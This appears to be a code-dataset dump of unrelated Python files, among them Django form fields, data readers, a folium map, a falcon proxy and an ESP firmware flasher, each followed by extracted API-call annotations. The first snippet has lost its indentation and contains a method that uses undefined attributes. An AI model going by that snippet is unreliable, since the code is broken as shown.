"Check to see if the provided value is a valid choice"
text_value = force_text(value)
if text_value.startswith("-"):
text_value = text_value[1:]
return text_value in self.field_map or super(GingerSortField, self).valid_value(text_value)
def build_links(self, request, bound_field):
value = bound_field.value()
field_name = bound_field.name
text_value = force_text(value) if value is not None else None
for k, v in self.choices:
content = force_text(v)
key = force_text(k)
is_active = text_value and text_value == key
if is_active and self.toggle:
next_value = key if text_value.startswith("-") else "-%s" % key
else:
next_value = key
url = utils.get_url_with_modified_params(request, {field_name: next_value})
yield ui.Link(url=url, content=content, is_active=is_active)
def invert_sign(self, name, neg):
if name.startswith("-"):
neg = not neg
return "%s%s" % ("-" if neg else "", name.lstrip("-"))
def handle_queryset(self, queryset, key, bound_field):
neg = key.startswith("-")
value = self.field_map[key.lstrip("-")]
invert = lambda a: self.invert_sign(a, neg)
values = map(invert, value.split())
return queryset.order_by(*values)
def get_value_for_name(self, name):
for value, key in six.iteritems(self.field_map):
if name == key:
return value
class GingerDataSetField(GingerSortField):
def __init__(self, dataset_class, process_list=False, **kwargs):
column_dict = dataset_class.get_column_dict()
self.reverse = kwargs.pop("reverse", False)
choices = [(name, col.label or name.title()) for name, col in six.iteritems(column_dict) if not col.hidden]
super(GingerDataSetField, self).__init__(choices=choices, **kwargs)
self.dataset_class = dataset_class
self.process_list = process_list
def handle_queryset(self, queryset, value, bound_field):
text_value = force_text(value) if value is not None else None
if not text_value:
return queryset
reverse = text_value.startswith("-")
column_dict = self.dataset_class.get_column_dict()
name = text_value[1:] if reverse else text_value
name = self.field_map[name]
col = column_dict[name]
if not col.sortable:
return queryset
attr = col.attr or name
if col.reverse:
reverse = not reverse
if reverse:
attr = "-%s" % attr
return queryset.order_by(attr)
def handle_dataset(self, dataset, value, bound_field):
text_value = force_text(value) if value is not None else None
if not text_value:
return
reverse = text_value.startswith("-")
value = text_value[1:] if reverse else text_value
name = self.field_map[value]
column = dataset.columns[name]
if column.reverse:
reverse = not reverse
column.sort(reverse=reverse)
class SortField(GingerSortField):
def __init__(self, *args, **kwargs):
super(SortField, self).__init__(*args, **kwargs)
warnings.warn("Please use GingerSortField instead of SortField", DeprecationWarning)
class GingerPageField(forms.IntegerField):
widget = EmptyWidget
html_name = None
def __init__(self, per_page=20, page_limit=10, **kwargs):
kwargs.setdefault('required', False)
self.per_page = per_page
self.page_limit = page_limit
super(GingerPageField, self).__init__(**kwargs)
def bind_form(self, name, form):
self.html_name = form[name].html_name
def clean(self, value):
try:
value = super(GingerPageField, self).clean(value)
except forms.ValidationError:
return 1
return value
def handle_queryset(self, queryset, value, data):
return paginator.paginate(queryset, value,
per_page=self.per_page,
parameter_name=self.html_name
)
def build_links(self, request, bound_field):
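        # NOTE: mirrors GingerSortField.build_links, but IntegerField defines
        # neither `choices` nor `toggle`; this needs page-based choices before use.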
value = bound_field.value()
field_name = bound_field.name
text_value = force_text(value) if value is not None else None
for k, v in self.choices:
content = force_text(v)
key = force_text(k)
is_active = text_value and text_value == key
if is_active and self.toggle:
next_value = key if text_value.startswith("-") else "-%s" % key
else:
next_value = key
url = utils.get_url_with_modified_params(request, {field_name: next_value})
yield ui.Link(url=url, content=content, is_active=is_active)
|
[
"django.forms.IntegerField",
"os.path.basename",
"ginger.utils.cm_to_feet_inches",
"ginger.paginator.paginate",
"django.core.validators.URLValidator",
"django.forms.TextInput",
"django.utils.six.iteritems",
"ginger.utils.feet_inches_to_cm",
"ginger.ui.Link",
"django.forms.HiddenInput",
"ginger.utils.get_url_with_modified_params",
"django.utils.six.moves.urllib.parse.urlparse",
"warnings.warn",
"django.utils.encoding.force_text",
"mimetypes.guess_type"
] |
[((1069, 1083), 'django.core.validators.URLValidator', 'URLValidator', ([], {}), '()\n', (1081, 1083), False, 'from django.core.validators import URLValidator\n'), ((1238, 1251), 'django.utils.six.moves.urllib.parse.urlparse', 'urlparse', (['url'], {}), '(url)\n', (1246, 1251), False, 'from django.utils.six.moves.urllib.parse import urlparse\n'), ((1307, 1329), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (1323, 1329), False, 'import os\n'), ((4261, 4278), 'django.utils.encoding.force_text', 'force_text', (['value'], {}), '(value)\n', (4271, 4278), False, 'from django.utils.encoding import force_text\n'), ((5653, 5682), 'django.utils.six.iteritems', 'six.iteritems', (['self.field_map'], {}), '(self.field_map)\n', (5666, 5682), False, 'from django.utils import six\n'), ((7488, 7576), 'warnings.warn', 'warnings.warn', (['"""Please use GingerSortField instead of SortField"""', 'DeprecationWarning'], {}), "('Please use GingerSortField instead of SortField',\n DeprecationWarning)\n", (7501, 7576), False, 'import warnings\n'), ((8236, 8331), 'ginger.paginator.paginate', 'paginator.paginate', (['queryset', 'value'], {'per_page': 'self.per_page', 'parameter_name': 'self.html_name'}), '(queryset, value, per_page=self.per_page, parameter_name=\n self.html_name)\n', (8254, 8331), False, 'from ginger import ui, utils, paginator\n'), ((2181, 2237), 'django.forms.TextInput', 'forms.TextInput', ([], {'attrs': "{'placeholder': '5', 'size': '3'}"}), "(attrs={'placeholder': '5', 'size': '3'})\n", (2196, 2237), False, 'from django import forms\n'), ((2239, 2295), 'django.forms.TextInput', 'forms.TextInput', ([], {'attrs': "{'placeholder': '6', 'size': '3'}"}), "(attrs={'placeholder': '6', 'size': '3'})\n", (2254, 2295), False, 'from django import forms\n'), ((2538, 2562), 'ginger.utils.cm_to_feet_inches', 'cm_to_feet_inches', (['value'], {}), '(value)\n', (2555, 2562), False, 'from ginger.utils import feet_inches_to_cm, cm_to_feet_inches\n'), ((3118, 3164), 'django.forms.IntegerField', 'forms.IntegerField', ([], {'min_value': '(0)', 'required': 'reqd'}), '(min_value=0, required=reqd)\n', (3136, 3164), False, 'from django import forms\n'), ((3177, 3223), 'django.forms.IntegerField', 'forms.IntegerField', ([], {'min_value': '(0)', 'required': 'reqd'}), '(min_value=0, required=reqd)\n', (3195, 3223), False, 'from django import forms\n'), ((3457, 3488), 'ginger.utils.feet_inches_to_cm', 'feet_inches_to_cm', (['feet', 'inches'], {}), '(feet, inches)\n', (3474, 3488), False, 'from ginger.utils import feet_inches_to_cm, cm_to_feet_inches\n'), ((4603, 4620), 'django.utils.encoding.force_text', 'force_text', (['value'], {}), '(value)\n', (4613, 4620), False, 'from django.utils.encoding import force_text\n'), ((4708, 4721), 'django.utils.encoding.force_text', 'force_text', (['v'], {}), '(v)\n', (4718, 4721), False, 'from django.utils.encoding import force_text\n'), ((4740, 4753), 'django.utils.encoding.force_text', 'force_text', (['k'], {}), '(k)\n', (4750, 4753), False, 'from django.utils.encoding import force_text\n'), ((5002, 5071), 'ginger.utils.get_url_with_modified_params', 'utils.get_url_with_modified_params', (['request', '{field_name: next_value}'], {}), '(request, {field_name: next_value})\n', (5036, 5071), False, 'from ginger import ui, utils, paginator\n'), ((6321, 6338), 'django.utils.encoding.force_text', 'force_text', (['value'], {}), '(value)\n', (6331, 6338), False, 'from django.utils.encoding import force_text\n'), ((6973, 6990), 'django.utils.encoding.force_text', 
'force_text', (['value'], {}), '(value)\n', (6983, 6990), False, 'from django.utils.encoding import force_text\n'), ((8554, 8571), 'django.utils.encoding.force_text', 'force_text', (['value'], {}), '(value)\n', (8564, 8571), False, 'from django.utils.encoding import force_text\n'), ((8659, 8672), 'django.utils.encoding.force_text', 'force_text', (['v'], {}), '(v)\n', (8669, 8672), False, 'from django.utils.encoding import force_text\n'), ((8691, 8704), 'django.utils.encoding.force_text', 'force_text', (['k'], {}), '(k)\n', (8701, 8704), False, 'from django.utils.encoding import force_text\n'), ((8953, 9022), 'ginger.utils.get_url_with_modified_params', 'utils.get_url_with_modified_params', (['request', '{field_name: next_value}'], {}), '(request, {field_name: next_value})\n', (8987, 9022), False, 'from ginger import ui, utils, paginator\n'), ((1551, 1577), 'mimetypes.guess_type', 'mimetypes.guess_type', (['name'], {}), '(name)\n', (1571, 1577), False, 'import mimetypes\n'), ((5090, 5144), 'ginger.ui.Link', 'ui.Link', ([], {'url': 'url', 'content': 'content', 'is_active': 'is_active'}), '(url=url, content=content, is_active=is_active)\n', (5097, 5144), False, 'from ginger import ui, utils, paginator\n'), ((6032, 6058), 'django.utils.six.iteritems', 'six.iteritems', (['column_dict'], {}), '(column_dict)\n', (6045, 6058), False, 'from django.utils import six\n'), ((9041, 9095), 'ginger.ui.Link', 'ui.Link', ([], {'url': 'url', 'content': 'content', 'is_active': 'is_active'}), '(url=url, content=content, is_active=is_active)\n', (9048, 9095), False, 'from ginger import ui, utils, paginator\n'), ((1750, 1769), 'django.forms.HiddenInput', 'forms.HiddenInput', ([], {}), '()\n', (1767, 1769), False, 'from django import forms\n')]
|
from common import *
import itertools
from scipy.sparse import csr_matrix
def nested_to_sparse(df, num_columns, index=None):
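    # Build a binary sparse matrix from a single-column DataFrame whose cells
    # hold iterables of column indices (np/pd are expected to come from `common`).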
if not (index is None): df = df.reindex(index)
assert len(df.columns) == 1
series = df[df.columns[0]]
N = num_columns
series.loc[series.isnull()] = series[series.isnull()].apply(lambda d: [])
idx_ptr = np.array([0] + list(series.apply(len).cumsum()))
idx = np.array(list(itertools.chain.from_iterable(series)))
data = np.ones(idx.shape)
return csr_matrix((data, idx, idx_ptr), shape=(len(df), N)).tocoo()
class PqReader(object):
def __init__(self, file, **kwargs):
self.file = file
self.__dict__.update(**kwargs)
def load(self):
self.data = pq.read_parquet(self.file)
self.data = self.process(self.data)
def process(self, data):
return data
def len_code(self):
return len(self.data.columns)
def as_matrix(self, index=None):
df = self.data
if not (index is None): df = df.reindex(index)
if isinstance(df, pd.Series): df = df.to_frame()
return df.as_matrix()
def keras_input(self, name):
import keras as K
return K.Input(self.data.shape, name=name)
class SparsePqReader(PqReader):
def load(self):
self.data = pq.read_parquet(self.file)
self.code = pq.read_parquet(self.file + ".code")
self.data, self.code = self.process(self.data, self.code)
def len_code(self):
return len(self.code)
def as_matrix(self, index=None):
N = self.len_code()
return nested_to_sparse(self.data, N, index)
def keras_input(self, name):
import keras as K
N = self.len_code()
        return K.Input((N,), sparse=True, name=name)
def process(self, data, code):
return data, code
class PqCutoffReader(PqReader):
def __init__(self, file, cutoffs, **kwargs):
self.file = file
self.cutoffs = cutoffs
self.__dict__.update(**kwargs)
def process(self, data):
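        # Expand each numeric column into binary indicator columns, one per
        # cutoff (value > cutoff), while propagating NaNs.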
df = data
COLS = []
for name in df.columns:
for c in self.cutoffs:
S = ( df[name] > c ).astype(float)
S.loc[ df[name].isnull() ] = np.nan
S = S.rename( (name, c) )
COLS.append( S )
return pd.concat(COLS, axis=1).astype(float)
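# Fill NaNs with `replace_null` and (when any are present) append a 0/1
# missingness-indicator column next to the filled series.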
def _missing_to_indicator(series, replace_null=0.0, conditionally=True):
mask = series.isnull()
if conditionally and not mask.any():
return series.to_frame()
series = series.fillna(replace_null)
mask = mask.astype("float")
return pd.concat([series, mask], axis=1)
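# Standardize a series to zero mean and unit variance (z-score).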
def _normalize(series):
m, s = series.mean(), series.std()
return (series - m) / s, m, s
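# Scale a series linearly into the [0, 1] range (min-max).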
def _window(series):
M, m = series.max(), series.min()
return ( series - m ) / (M - m), M, m
class ExprReader(PqReader):
expression = NotImplemented
def get_vars(self, data):
V = {}
for f in data.columns:
V[f] = data[f]
return V
def process(self,data):
OUT = eval(self.expression, self.get_vars(data),{})
OUT, self.max, self.min = _window(OUT)
return _missing_to_indicator(OUT, conditionally=True)
class AgeReader(PqReader):
def process(self, data):
Y = (data.ADMIT_DATE - data.MASKED_DOB).dt.days / 365.25
Y, self.max, self.min = _window(Y)
return _missing_to_indicator(Y, conditionally=True)
class FilterSparsePqReader(SparsePqReader):
def process(self, data, code):
filter = self.filter(data, code)
new_code = code.reindex( code.index[~filter] )
MAP = { i:n for n,i in enumerate(new_code.index) }
new_code = new_code.reset_index()
new_data = data.apply(self.remap, args=(MAP,))
return new_data, new_code
def filter(self, data, code): return []
def remap(self, seqs, map):
out = []
for seq in seqs:
if seq is np.nan:
out.append(seq)
continue
new_map = np.array([map[s] for s in seq if s in map])
if not len(new_map): new_map = np.nan
out.append(new_map)
return out
class MultiFilterSparsePqReader(SparsePqReader):
def process(self, data, code):
for name, filter, negate in self.filter(data, code):
if negate: filter = ~filter
new_code = code.reindex( code.index[filter] )
MAP = { i:n for n,i in enumerate(new_code.index) }
new_code = new_code.reset_index()
new_data = data.apply(self.remap, args=(MAP,))
self.add(name, new_data, new_code)
return None, code
def add(self, name, data, code):
if hasattr(type(self), name):
raise RuntimeError("Filter name '%s' clobbers attribute of class '%s'" % (name, str(type(self))))
R = SparsePqReader(self, data = data, code = code, name = name)
self.__dict__[name] = R
def filter(self, data, code): yield []
def remap(self, seqs, map):
out = []
for seq in seqs:
if seq is np.nan:
out.append(seq)
continue
new_map = np.array([map[s] for s in seq if s in map])
if not len(new_map): new_map = np.nan
out.append(new_map)
return out
|
[
"keras.Input",
"itertools.chain.from_iterable"
] |
[((1206, 1241), 'keras.Input', 'K.Input', (['self.data.shape'], {'name': 'name'}), '(self.data.shape, name=name)\n', (1213, 1241), True, 'import keras as K\n'), ((1744, 1781), 'keras.Input', 'K.Input', (['(N,)'], {'sparse': '(True)', 'name': 'name'}), '((N,), sparse=True, name=name)\n', (1751, 1781), True, 'import keras as K\n'), ((431, 468), 'itertools.chain.from_iterable', 'itertools.chain.from_iterable', (['series'], {}), '(series)\n', (460, 468), False, 'import itertools\n')]
|
import folium
map = folium.Map(location = [40.7864, 17.2409], zoom_start=6, tiles = "OpenStreetMap")
fgv = folium.FeatureGroup(name="To Visit")
fgv.add_child(folium.Marker(location = [40.7864, 17.2409], popup = "Arbelobello,Italy", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [43.7696, 11.2558], popup = "Florence,Italy", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [43.8429, 10.5027], popup = "Lucca,Italy", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [40.3980, 17.6377], popup = "Manduria,Italy", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [40.3515, 18.1750], popup = "Lecce,Italy", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [44.1116, 9.7339], popup = "Manarola,Italy", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [42.6826, 11.7142], popup = "Sorano,Italy", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [-20.2067, 57.5522], popup = "Mauritius", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [50.0647, 19.9450], popup = "Krakow, Poland", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [44.4056, 8.9463], popup = "Genoa,Italy", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [41.9794, 2.8214], popup = "Girona,Spain", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [41.3851, 2.1734], popup = "Barcelona,Spain", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [-2.3326, 34.6857], popup = "Serengeti,Tanzania", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [52.3667, 4.8945], popup = "Amsterdam,Netherlands", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [57.4737, -4.0918], popup = "Culloden,Scotland", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [42.6507, 18.0944], popup = "Dubrovnik,Crotaia", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [48.8566, 2.3522], popup = "Paris,France", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [28.6050, -80.6026], popup = "Kennedy Space Center,USA", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [-38.2619, 175.0986], popup = "Waitomo,New Zealand", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgv.add_child(folium.Marker(location = [41.9047, 12.4547], popup = "Vatican City,Italy", icon = folium.Icon(color="cadetblue", icon="briefcase")))
fgp = folium.FeatureGroup(name="Population")
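# Shade countries by 2005 population: green < 10M, orange 10-20M, red >= 20M.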
fgp.add_child(folium.GeoJson(data=open('world.json', 'r', encoding='utf-8-sig').read(),
style_function=lambda x: {'fillColor':'green' if x['properties']['POP2005'] < 10000000
else 'orange' if 10000000 <= x['properties']['POP2005'] < 20000000 else 'red'}))
map.add_child(fgv)
map.add_child(fgp)
map.add_child(folium.LayerControl())
map.save("map.html")
|
[
"folium.FeatureGroup",
"folium.LayerControl",
"folium.Map",
"folium.Icon"
] |
[((27, 103), 'folium.Map', 'folium.Map', ([], {'location': '[40.7864, 17.2409]', 'zoom_start': '(6)', 'tiles': '"""OpenStreetMap"""'}), "(location=[40.7864, 17.2409], zoom_start=6, tiles='OpenStreetMap')\n", (37, 103), False, 'import folium\n'), ((117, 153), 'folium.FeatureGroup', 'folium.FeatureGroup', ([], {'name': '"""To Visit"""'}), "(name='To Visit')\n", (136, 153), False, 'import folium\n'), ((3063, 3101), 'folium.FeatureGroup', 'folium.FeatureGroup', ([], {'name': '"""Population"""'}), "(name='Population')\n", (3082, 3101), False, 'import folium\n'), ((3422, 3443), 'folium.LayerControl', 'folium.LayerControl', ([], {}), '()\n', (3441, 3443), False, 'import folium\n'), ((252, 300), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (263, 300), False, 'import folium\n'), ((396, 444), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (407, 444), False, 'import folium\n'), ((537, 585), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (548, 585), False, 'import folium\n'), ((681, 729), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (692, 729), False, 'import folium\n'), ((822, 870), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (833, 870), False, 'import folium\n'), ((965, 1013), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (976, 1013), False, 'import folium\n'), ((1107, 1155), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (1118, 1155), False, 'import folium\n'), ((1247, 1295), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (1258, 1295), False, 'import folium\n'), ((1391, 1439), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (1402, 1439), False, 'import folium\n'), ((1531, 1579), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (1542, 1579), False, 'import folium\n'), ((1672, 1720), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (1683, 1720), False, 'import folium\n'), ((1816, 1864), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (1827, 1864), False, 'import folium\n'), ((1964, 2012), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (1975, 2012), False, 'import folium\n'), ((2114, 2162), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (2125, 2162), False, 'import folium\n'), ((2261, 2309), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (2272, 2309), False, 'import folium\n'), ((2408, 
2456), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (2419, 2456), False, 'import folium\n'), ((2549, 2597), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (2560, 2597), False, 'import folium\n'), ((2704, 2752), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (2715, 2752), False, 'import folium\n'), ((2855, 2903), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (2866, 2903), False, 'import folium\n'), ((3003, 3051), 'folium.Icon', 'folium.Icon', ([], {'color': '"""cadetblue"""', 'icon': '"""briefcase"""'}), "(color='cadetblue', icon='briefcase')\n", (3014, 3051), False, 'import folium\n')]
|
import psutil, os
p = psutil.Process(os.getpid())
for dll in p.memory_maps():
print(dll.path)
|
[
"os.getpid"
] |
[((38, 49), 'os.getpid', 'os.getpid', ([], {}), '()\n', (47, 49), False, 'import psutil, os\n')]
|
from django.contrib import admin
from .models import MyModel
@admin.register(MyModel)
class MyModelAdmin(admin.ModelAdmin):
list_display = ["id", "image"]
|
[
"django.contrib.admin.register"
] |
[((65, 88), 'django.contrib.admin.register', 'admin.register', (['MyModel'], {}), '(MyModel)\n', (79, 88), False, 'from django.contrib import admin\n')]
|
# -*- coding: utf-8 -*-
import traceback
from urllib.parse import urlparse
import falcon
import fire
import requests
import waitress
from transformer import Transformer
class Proxy:
"""
A falcon middleware acting as a proxy server
"""
def __init__(self, target):
"""
:param target: target domain to serve
Also configures a Transformer instance that will be used to transform
the html response of the target domain
"""
self.target_domain = target.split('/')[-1] # remove possible 'http://'
self.transformer = Transformer(target_domain=self.target_domain)
def process_request(self, req, resp):
"""
Middleware defining the proxy logic itself
:param req: initial http request
:param resp: http response that the middleware is acting on
:return: None
"""
try:
# redirects request to the target domain
request_source = urlparse(req.url).netloc
url = req.url.replace(request_source, self.target_domain)
            response = requests.get(url)
            response.raise_for_status()
            page = response.text
resp.body = self.transformer.transform(page, request_source)
except Exception as e:
resp.status = falcon.HTTP_500
error_info = { # object to render in case of exception
'exc': e,
'exc_info': traceback.format_exc(),
'url': req.url,
'target': self.target_domain
}
resp.body = """
<h3>Exception: {exc} </h4>
<hr /> {exc_info} <hr />
<h4>URL: {url} </h4>
<h4>Target: {target} </h4>""".format(**error_info)
def process_response(self, req, resp, resource, req_succeeded):
"""
Sets appropriate Content-Type
Prevents server from responding 404, does nothing if resp code is 500
"""
resp.set_header('Content-Type', 'text/html;charset=UTF-8')
if resp.status == falcon.HTTP_NOT_FOUND:
resp.status = falcon.HTTP_200
def main(host='localhost', port=8080, target='http://habrahabr.ru'):
api = falcon.API(middleware=[Proxy(target), ])
print('Target domain: {}'.format(target))
waitress.serve(api, host=host, port=port)
if __name__ == '__main__':
fire.Fire(main) # Fire wrapper adds CLI behaviour
|
[
"transformer.Transformer",
"fire.Fire",
"waitress.serve",
"traceback.format_exc",
"requests.get",
"urllib.parse.urlparse"
] |
[((2306, 2347), 'waitress.serve', 'waitress.serve', (['api'], {'host': 'host', 'port': 'port'}), '(api, host=host, port=port)\n', (2320, 2347), False, 'import waitress\n'), ((2381, 2396), 'fire.Fire', 'fire.Fire', (['main'], {}), '(main)\n', (2390, 2396), False, 'import fire\n'), ((588, 633), 'transformer.Transformer', 'Transformer', ([], {'target_domain': 'self.target_domain'}), '(target_domain=self.target_domain)\n', (599, 633), False, 'from transformer import Transformer\n'), ((1090, 1107), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (1102, 1107), False, 'import requests\n'), ((979, 996), 'urllib.parse.urlparse', 'urlparse', (['req.url'], {}), '(req.url)\n', (987, 996), False, 'from urllib.parse import urlparse\n'), ((1435, 1457), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (1455, 1457), False, 'import traceback\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import shutil
import tempfile
import nacl.signing
import os
import sys
import yaml
import logging.config
from config.logging import LOGGING_CONFIG
logging.config.dictConfig(LOGGING_CONFIG)
logger = logging.getLogger("utils")
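# Render 32 byte values as the body of a C array initializer, eight per line.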
def write_array(arr: list) -> str:
buff = ""
i = 0
while i < 32:
buff += arr[i]
if i != 31:
buff += ", "
i += 1
if i % 8 == 0:
buff += "\n "
return buff
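# Generate an Ed25519 keypair via PyNaCl and format both keys as C hex literals.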
def generate_keys() -> tuple:
signing_key = nacl.signing.SigningKey.generate()
signing_array = [int(x) for x in bytes(signing_key)]
signing_letters = ["0x{0:02X}".format(x) for x in signing_array]
verify_key = signing_key.verify_key
verify_array = [int(x) for x in bytes(verify_key)]
verify_letters = ["0x{0:02X}".format(x) for x in verify_array]
return signing_letters, verify_letters
def main() -> None:
parser = argparse.ArgumentParser(description="Prepare and flush ESP firmware")
parser.add_argument(
"-s",
metavar="source",
type=str,
default=".",
help="firmware folder (default to current dir)",
)
parser.add_argument(
"-c",
metavar="config",
type=str,
default="config.yaml",
help="Path to configuration file",
)
parser.add_argument(
"-p", "--port", metavar="port", type=str, help="Port the board is connected to"
)
args = parser.parse_args()
if args.port:
port = args.port
else:
if sys.platform.startswith("win32"):
port = "COM1"
else:
port = "/dev/ttyUSB0"
logger.debug(f"Port is {port}")
with open(args.c) as f:
settings = yaml.load(f.read(), Loader=yaml.FullLoader)
ino = os.path.abspath(args.s)
source_file = os.listdir(os.path.join(ino, "src"))[0]
with open(os.path.join(ino, "src", source_file), "r") as f:
firmware = f.read()
for k, v in settings.items():
firmware = firmware.replace(k, str(v))
tempenv = tempfile.TemporaryDirectory()
    logger.debug(f"Temporary directory created: {tempenv.name}")
os.chdir(tempenv.name)
os.mkdir("src")
with open(os.path.join("src", source_file), "w") as f:
f.write(firmware)
logger.debug(firmware)
logger.debug("File {} is written".format(os.path.join("src", source_file)))
os.mkdir("include")
sk, vk = generate_keys()
with open(os.path.join("include", "secrets.h"), "w") as f:
f.write("uint8_t signing_key[32] = {\n ")
f.write(write_array(sk))
f.write(f"}};\n\nuint8_t verifying_key[32] = {{\n ")
f.write(write_array(vk))
f.write("};")
shutil.copyfile(os.path.join(ino, "platformio.ini"), "platformio.ini")
os.environ["PLATFORMIO_UPLOAD_PORT"] = port
if sys.platform.startswith("win32"):
os.system("python -m platformio run")
os.system("python -m platformio run -t upload")
else:
os.system("python3 -m platformio run")
os.system("python3 -m platformio run -t upload")
os.chdir(ino)
if __name__ == "__main__":
main()
|
[
"os.mkdir",
"os.path.abspath",
"sys.platform.startswith",
"tempfile.TemporaryDirectory",
"argparse.ArgumentParser",
"os.system",
"os.path.join",
"os.chdir"
] |
[((971, 1040), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Prepare and flush ESP firmware"""'}), "(description='Prepare and flush ESP firmware')\n", (994, 1040), False, 'import argparse\n'), ((1835, 1858), 'os.path.abspath', 'os.path.abspath', (['args.s'], {}), '(args.s)\n', (1850, 1858), False, 'import os\n'), ((2106, 2135), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {}), '()\n', (2133, 2135), False, 'import tempfile\n'), ((2203, 2225), 'os.chdir', 'os.chdir', (['tempenv.name'], {}), '(tempenv.name)\n', (2211, 2225), False, 'import os\n'), ((2230, 2245), 'os.mkdir', 'os.mkdir', (['"""src"""'], {}), "('src')\n", (2238, 2245), False, 'import os\n'), ((2451, 2470), 'os.mkdir', 'os.mkdir', (['"""include"""'], {}), "('include')\n", (2459, 2470), False, 'import os\n'), ((2897, 2929), 'sys.platform.startswith', 'sys.platform.startswith', (['"""win32"""'], {}), "('win32')\n", (2920, 2929), False, 'import sys\n'), ((3152, 3165), 'os.chdir', 'os.chdir', (['ino'], {}), '(ino)\n', (3160, 3165), False, 'import os\n'), ((1587, 1619), 'sys.platform.startswith', 'sys.platform.startswith', (['"""win32"""'], {}), "('win32')\n", (1610, 1619), False, 'import sys\n'), ((2786, 2821), 'os.path.join', 'os.path.join', (['ino', '"""platformio.ini"""'], {}), "(ino, 'platformio.ini')\n", (2798, 2821), False, 'import os\n'), ((2939, 2976), 'os.system', 'os.system', (['"""python -m platformio run"""'], {}), "('python -m platformio run')\n", (2948, 2976), False, 'import os\n'), ((2985, 3032), 'os.system', 'os.system', (['"""python -m platformio run -t upload"""'], {}), "('python -m platformio run -t upload')\n", (2994, 3032), False, 'import os\n'), ((3051, 3089), 'os.system', 'os.system', (['"""python3 -m platformio run"""'], {}), "('python3 -m platformio run')\n", (3060, 3089), False, 'import os\n'), ((3098, 3146), 'os.system', 'os.system', (['"""python3 -m platformio run -t upload"""'], {}), "('python3 -m platformio run -t upload')\n", (3107, 3146), False, 'import os\n'), ((1888, 1912), 'os.path.join', 'os.path.join', (['ino', '"""src"""'], {}), "(ino, 'src')\n", (1900, 1912), False, 'import os\n'), ((1931, 1968), 'os.path.join', 'os.path.join', (['ino', '"""src"""', 'source_file'], {}), "(ino, 'src', source_file)\n", (1943, 1968), 